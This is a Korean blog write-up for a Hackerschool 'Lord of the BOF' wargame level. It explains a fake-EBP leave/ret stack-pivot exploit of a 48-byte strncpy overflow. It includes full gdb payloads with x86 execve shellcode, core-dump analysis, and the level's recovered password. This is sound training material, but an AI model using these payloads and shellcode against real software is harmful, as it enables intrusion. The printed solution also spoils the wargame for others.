[lob] assassin -> zombie_assassin

2022. 9. 16. 16:14·Wargame/Hackerchool
728x90
반응형

1. intro

 

2. code 및 분석

2.1.  C code

/*
        The Lord of the BOF : The Fellowship of the BOF
        - zombie_assassin
        - FEBP
*/

#include <stdio.h>
#include <stdlib.h>

main(int argc, char *argv[])
{
        char buffer[40];

        if(argc < 2){
                printf("argv error\n");
                exit(0);
        }

        if(argv[1][47] == '\xbf')
        {
                printf("stack retbayed you!\n");
                exit(0);
        }

        if(argv[1][47] == '\x40')
        {
                printf("library retbayed you, too!!\n");
                exit(0);
        }

        // strncpy instead of strcpy!
        strncpy(buffer, argv[1], 48);
        printf("%s\n", buffer);
}

 

2.2. 분석

이전과 동일하지만 strncpy를 통해 buffer에 복사되는 길이만 다르다.

 

3. 취약점 확인 및 공격 준비

3.1. 취약점

ret address 변조 가능... 이젠 쓰기도 귀찮아지려 하는구먼 ㅋㅋㅋㅋ

다만, ret address 까지만 복사되기 때문에 이제는 ret gadget으로는 해결이 안 된다.

 

3.2. 공격 준비

다시 한번 프로그램이 종료될 때를 생각해보자.

leave 시 ebp를 복구하고, ret에서 eip에 값을 넣은 후 jmp eip를 실행한다.

어셈블러 코드로 보면

leave는

mov ebp, esp
pop ebp

ret은

pop eip
jmp eip

이다.

만일 main 함수 에필로그에서 ebp, 즉 sfp에 특정 값을 넣고 ret address 위치에 leave & ret gadget을 삽입한다면, 다시 한번 ebp가 setting 될테고 해당 주소 이후의 값이 ret address가 될 것이다.

 

그러므로 페이로드를 작성해보면 아래와 같다.

dummy 40 bytes + sfp (actual ret - 4 byte, fake ebp의 주소) 4bytes + ret (leave, ret gadget) 4 bytes
+ dummy (fake ebp) 4 byte + ret (actual ret val's address, fake ebp + 4) 4 byte + actual ret val 4 byte + nop & shellcode

 

가젯부터 구해보면 main의 그것을 쓰면 될 것 같다.

0x80484df <main+159>:   leave
0x80484e0 <main+160>:   ret

 

대략 페이로드를 작성해 실제 주소를 확인해보면 아래와 같다.

(gdb) r `python -c 'print "A"*40 + "BBBB" + "\xdf\x84\x04\x08" + "CCCC" + "DDDD" + "EEEE" + "\x90"*0x30 + "\x31\xc0\x89\xc2\x89\xc1\x50\x68\x70\x61\x73\x73\x68\x2f\x6d\x79\x2d\x68\x2f\x62\x69\x6e\x89\xe3\xb0\x0b\xcd\x80"'`         Starting program: /home/assassin/zombie_assassia `python -c 'print "A"*40 + "BBBB" + "\xdf\x84\x04\x08" + "CCCC" + "DDDD" + "EEEE" + "\x90"*0x30 + "\x31\xc0\x89\xc2\x89\xc1\x50\x68\x70\x61\x73\x73\x68\x2f\x6d\x79\x2d\x68\x2f\x62\x69\x6e\x89\xe3\xb0\x0b\xcd\x80"'`
/bin/bash2: /home/bugbear/.bashrc: Permission denied
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBB߄

Program received signal SIGSEGV, Segmentation fault.
0x80484df in main ()
(gdb) x/40x $esp - 40
....
0xbffffbd8:     0x41414141      0x41414141      0x41414141      0x41414141
0xbffffbe8:     0x41414141      0x41414141      0x41414141      0x42424242
0xbffffbf8:     0x080484df      0x43434343      0x44444444      0x45454545
0xbffffc08:     0x90909090      0x90909090      0x90909090      0x90909090

 

4. exploit

위를 토대로 페이로드를 작성해서 시도.

(gdb) r  `python -c 'print "A"*40 + "\xfc\xfb\xff\xbf" + "\xdf\x84\x04\x08" + "DDDD" + "\x08\xfc\xff\xbf" + "\x0c\xfc\xff\xbf" + "\x90"*0x30 + "\x31\xc0\x89\xc2\x89\xc1\x50\x68\x70\x61\x73\x73\x68\x2f\x6d\x79\x2d\x68\x2f\x62\x69\x6e\x89\xe3\xb0\x0b\xcd\x80"'`
Starting program: /home/assassin/zombie_assassia `python -c 'print "A"*40 + "\xfc\xfb\xff\xbf" + "\xdf\x84\x04\x08" + "DDDD" + "\x08\xfc\xff\xbf" + "\x0c\xfc\xff\xbf" + "\x90"*0x30 + "\x31\xc0\x89\xc2\x89\xc1\x50\x68\x70\x61\x73\x73\x68\x2f\x6d\x79\x2d\x68\x2f\x62\x69\x6e\x89\xe3\xb0\x0b\xcd\x80"'`
/bin/bash2: /home/bugbear/.bashrc: Permission denied
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA▒▒▒▒߄

Program received signal SIGINT, Interrupt.
0xbffffc0c in ?? ()
(gdb) c
Continuing.

Program received signal SIGTRAP, Trace/breakpoint trap.
0x40001990 in _start () at rtld.c:142
142     rtld.c: No such file or directory.
(gdb) c
Continuing.
euid = 515
pushing me away

 

gdb에서는 되는데 실 파일에서는 안된다.

[assassin@localhost assassin]$ ./zombie_assassia `python -c 'print "A"*40 + "\xfc\xfb\xff\xbf" + "\xdf\x84\x04\x08" + "DDDD" + "\x08\xfc\xff\xbf" + "\x0c\xfc\xff\xbf" + "\x90"*0x30 + "\x31\xc0\x89\xc2\x89\xc1\x50\x68\x70\x61\x73\x73\x68\x2f\x6d\x79\x2d\x68\x2f\x62\x69\x6e\x89\xe3\xb0\x0b\xcd\x80"'`
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA▒▒▒▒߄
Segmentation fault (core dumped)

core 파일을 뜯어보자.

[assassin@localhost assassin]$ gdb -c core
...
Program terminated with signal 11, Segmentation fault.
#0  0x90909090 in ?? ()
...
(gdb) x/40x $esp-41
0xbffffbdb:     0x41414141      0x41414141      0x41414141      0xbffffbfc
0xbffffbeb:     0x080484df      0x44444444      0xbffffc08      0xbffffc0c
0xbffffbfb:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffffc0b:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffffc1b:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffffc2b:     0xc289c031      0x6850c189      0x73736170      0x796d2f68
0xbffffc3b:     0x622f682d      0xe3896e69      0x80cd0bb0      0x44575000
0xbffffc4b:     0x6f682f3d      0x612f656d      0x73617373      0x006e6973
0xbffffc5b:     0x4f4d4552      0x4f484554      0x313d5453      0x312e3239
0xbffffc6b:     0x312e3836      0x00312e37      0x54534f48      0x454d414e

이를 토대로 수정 및 재 시도.

[assassin@localhost assassin]$ ./zombie_assassia `python -c 'print "A"*40 + "\xf3\xfb\xff\xbf" + "\xdf\x84\x04\x08" + "DDDD" + "\xf7\xfb\xff\xbf" + "\xfa\xfb\xff\xbf" + "\x90"*0x30 + "\x31\xc0\x89\xc2\x89\xc1\x50\x68\x70\x61\x73\x73\x68\x2f\x6d\x79\x2d\x68\x2f\x62\x69\x6e\x89\xe3\xb0\x0b\xcd\x80"'`
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA▒▒▒▒߄
euid = 515
pushing me away
[assassin@localhost assassin]$ ./zombie_assassin `python -c 'print "A"*40 + "\xf3\xfb\xff\xbf" + "\xdf\x84\x04\x08" + "DDDD" + "\xf7\xfb\xff\xbf" + "\xfa\xfb\xff\xbf" + "\x90"*0x30 + "\x31\xc0\x89\xc2\x89\xc1\x50\x68\x70\x61\x73\x73\x68\x2f\x6d\x79\x2d\x68\x2f\x62\x69\x6e\x89\xe3\xb0\x0b\xcd\x80"'`
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA▒▒▒▒߄
euid = 516
no place to hide
728x90
반응형
저작자표시 비영리 변경금지 (새창열림)

'Wargame > Hackerchool' 카테고리의 다른 글

[lob] succubus -> nightmare  (0) 2022.09.21
[lob] zombie_assassin -> succubus  (0) 2022.09.16
[lob] giant -> assassin  (0) 2022.09.16
[lob] bugbear -> giant  (0) 2022.09.15
[lob] darkknight -> bugbear  (0) 2022.09.15
'Wargame/Hackerchool' 카테고리의 다른 글
  • [lob] succubus -> nightmare
  • [lob] zombie_assassin -> succubus
  • [lob] giant -> assassin
  • [lob] bugbear -> giant
wyv3rn
wyv3rn
아저씨의 흔한 취미. wyv3rn#1249
  • wyv3rn
    think storage
    wyv3rn
  • 전체
    오늘
    어제
    • 분류 전체보기 (500) N
      • To do list (7) N
        • Doing (1) N
        • Complete (6)
      • Diary (35)
      • Tips & theory (77)
      • Kernel Exploit (27) N
        • Theory (15)
        • Exercise (5) N
      • Wargame (313)
        • pwn.college (34)
        • Dreamhack (148)
        • pwnable.kr (15)
        • Lord of Sqlinjection (3)
        • Cryptohack (20)
        • Root me (27)
        • CodeEngn (4)
        • Exploit Education (22)
        • ROP Emporium (8)
        • H4C (10)
        • Hackerchool (22)
      • CTF (41) N
        • Solved (39) N
        • Unsolved (2)
      • Script (0)
  • 블로그 메뉴

    • 홈
    • 방명록
  • 링크

  • 공지사항

    • PWN wargame 모음 (및 느낀점)
    • 비공개 글들에 대해.
    • 뭐라도 하나 얻어가시길...
  • 인기 글

  • 태그

    root-me
    x64
    pwnable.kr
    phoenix
    BOF
    rop
    Me
    hackerschool
    Buffer Overflow
    dreamhack
    heap
    root
    cryptohack
    libc
    FSB
    la ctf
    CANARY
    pwntools
    32bit
    64bit
    vtable
    _IO_FILE
    ROOT ME
    exploit education
    lob
    x86
    RTL
    docker
    tcache
    Format String Bug
  • 최근 댓글

  • 최근 글

  • 250x250
    반응형
  • hELLO· Designed By정상우.v4.10.3
wyv3rn
[lob] assassin -> zombie_assassin
상단으로

티스토리툴바